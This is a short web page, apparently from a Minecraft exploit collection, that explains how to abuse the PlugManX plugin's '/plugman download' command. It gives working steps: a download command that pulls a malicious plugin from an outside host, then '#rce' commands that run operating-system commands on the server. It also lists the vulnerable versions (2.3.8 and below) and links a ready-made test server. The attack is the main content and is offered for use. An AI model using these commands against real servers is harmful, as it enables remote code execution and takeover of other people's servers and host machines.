Plugman X

PlugMan is a simple, easy to use plugin that lets server admins manage plugins from either in-game or console without the need to restart the server. The problem with this plugin is that it allows you to download plugins from unofficial sites.

How the exploit works

The exploit is based on using the /plugman download command to download a malicious plugin to compromise the server.

How to use the exploit

To perform this exploit, the PlugManX /plugman download command must be enabled, then enter the following:

01

Download the malicious plugin

In this example, a malicious test plugin created by me is attached.

$
/plugman download direct https://mcptoolspigotrce.mcptool.net/
02

Test the infected plugin

Check that the plugin has loaded correctly

$
#rce help
03

Run a command on the server operating system

Commands can now be executed remotely using the #rce command. In this example I use a command to open the notepad of my PC where the server is hosted.

$
#rce cmd start notepad.exe

Vulnerable versions

Vulnerable versions of this plugin are 2.3.8 and below (Since version 2.3.7, the /plugman downlaod command is disabled by default).

Try it yourself

You can download a server with everything you need to test the exploit locally on your PC from this link.

← CommandPanels Exploit PluginManager Exploit →